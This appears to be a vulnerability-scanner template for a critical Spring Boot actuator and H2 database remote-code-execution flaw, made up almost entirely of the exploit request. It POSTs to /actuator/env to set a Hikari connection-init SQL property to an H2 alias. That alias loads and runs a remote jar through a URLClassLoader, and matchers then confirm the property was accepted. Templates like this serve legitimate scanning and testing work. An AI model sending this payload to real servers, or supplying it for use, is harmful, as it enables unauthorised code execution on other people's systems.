id: springboot-h2-db-rce

info:
  name: Spring Boot H2 Database RCE
  author: dwisiswant0
  severity: critical

  # Payload taken from @pyn3rd (Twitter), see reference[2].

  # References:
  # - [1] https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database
  # - [2] https://twitter.com/pyn3rd/status/1305151887964946432
  # - [3] https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
  # - [4] https://github.com/spaceraccoon/spring-boot-actuator-h2-rce

requests:
  - method: POST
    path:
      - "{{BaseURL}}/actuator/env"
    headers:
      Content-Type: "application/json"
    body: |
      {
        "name": "spring.datasource.hikari.connection-init-sql",
        "value":"CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName(\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$; CALL remoteUrl()"
      }
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "\"spring.datasource.hikari.connection-init-sql\":\""
        condition: and
        part: body
      - type: word
        words:
          - "application/vnd.spring-boot.actuator"
        part: header